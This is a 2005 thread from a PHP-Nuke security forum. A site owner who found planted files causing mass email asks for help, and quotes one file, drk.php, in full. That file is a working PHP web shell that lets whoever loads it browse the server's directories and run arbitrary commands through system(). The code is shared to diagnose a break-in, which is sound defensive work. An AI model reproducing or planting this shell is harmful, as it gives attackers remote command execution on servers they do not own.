Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
sqzdog
Involved
Involved


Joined: Sep 22, 2003
Posts: 252

PostPosted: Tue Aug 23, 2005 6:20 pm Reply with quote

I found some suspicious files that were the cause of thousands of emails being generated from our server. They were single files located under the modules folder. drk.php, inc.php, magic.php, inc123.php, shell.php and teste.php. I am wondering if I have the permissions to this modules folder set wrong. Those files got there somehow. What is the proper permission setting for this and other nuke folders?
 
View user's profile Send private message Send e-mail
sting
Involved
Involved


Joined: Sep 23, 2003
Posts: 456
Location: Somewhere out there...

PostPosted: Tue Aug 23, 2005 9:55 pm Reply with quote

I believe most are 755.

-sting
 
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
Xiode
Regular
Regular


Joined: Jun 15, 2005
Posts: 78
Location: AR

PostPosted: Wed Aug 24, 2005 11:10 am Reply with quote

I don't have any extra files in my modules folder. I am not sure if they might be associated somehow with something you have installed. Try this. Back those files up on your comp taking note of where they go, and delete them off your server. See if that changes anything. Something to try.

_________________
**Mental Note** Signature Goes Here! 
View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger
sqzdog
PostPosted: Wed Aug 24, 2005 1:06 pm Reply with quote

Done. No attacks yet.....
 
sting
PostPosted: Wed Aug 24, 2005 1:49 pm Reply with quote

Did you take a look inside the files to see what they actually do?

-sting
 
sqzdog
PostPosted: Wed Aug 24, 2005 3:58 pm Reply with quote

Yeah, they all seemed to do the same thing. Here's what drk.php said. See if you can tell what it means:

Quote:

<html> <head>

<title>evilsecurity</title>

</head>

<font face="Tahoma" size="+1">PHP Shell</font></h1>

<?php

/* First we check if there has been asked for a working directory. */

if (isset($work_dir)) {

/* A workdir has been asked for - we chdir to that dir. */

chdir($work_dir);

$work_dir = exec("pwd");

} else {

/* No work_dir - we chdir to $DOCUMENT_ROOT */

chdir($DOCUMENT_ROOT);

$work_dir = $DOCUMENT_ROOT;

}

?>

<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">

<p><b>Diretório em que vocę está no momento:

<?php

$work_dir_splitted = explode("/", substr($work_dir, 1));

echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "/&command=" .
urlencode($command) . "\">Root</a>/";

if ($work_dir_splitted[0] == "") {
$work_dir = "/"; /* Root directory. */

} else {

for ($i = 0; $i < count($work_dir_splitted); $i++) {

/* echo "i = $i";*/

$url .= "/".$work_dir_splitted[$i];

echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "&command=" .
urlencode($command) . "\">$work_dir_splitted[$i]</a>/";

}

}

?>

</b></p>

<p><b>Escolha abaixo o diretório em que deseja ir:</b></p>

<select name="work_dir" onChange="this.form.submit()">

<?php

/* Now we make a list of the directories. */

$dir_handle = opendir($work_dir);

/* Run through all the files and directories to find the dirs. */

while ($dir = readdir($dir_handle)) {

if (is_dir($dir)) {

if ($dir == ".") {

echo "<option value=\"$work_dir\" selected>Current
Directory</option>\n";

} elseif ($dir == "..") {

/* We have found the parent dir. We must be carefull if the parent

directory is the root directory (/). */

if (strlen($work_dir) == 1) {

/* work_dir is only 1 charecter - it can only be / */

} elseif (strrpos($work_dir, "/") == 0) {

/* The last / in work_dir were the first charecter.

This means that we have a top-level directory

eg. /bin or /home etc... */

echo "<option value=\"/\">Parent Directory</option>\n";

} else {

/* We do a little bit of string-manipulation to find the parent

directory... Trust me - it works Smile */

echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"),
1)) ."\">Parent Directory</option>\n";

}

} else {

if ($work_dir == "/") {

echo "<option value=\"$work_dir$dir\">$dir</option>\n";

} else {

echo "<option value=\"$work_dir/$dir\">$dir</option>\n";

}

}

}

}

closedir($dir_handle);

?>

</select>

<p><b>Digite abaixo os comandos que deseja executar:</b></p>

<input type="text" name="command" size="60" <?php if ($command) { echo
"value=\"$command\"";} ?> > <input name="submit_btn" type="submit"
value="Execute Command"></p>

<p>Ligar/Ativar <code>stderr</code>-trapping?

<input type="checkbox" name="stderr"></p>

<p><b>Abaixo, terminal onde aparecerá os resultados dos comandos
que

vocę executou</b></p>

<p>

<textarea cols="80" rows="20" readonly>

<?php

if ($command) {
if ($stderr) {
system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm
/tmp/output.txt");
} else {
system($command);
}
}
?>
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©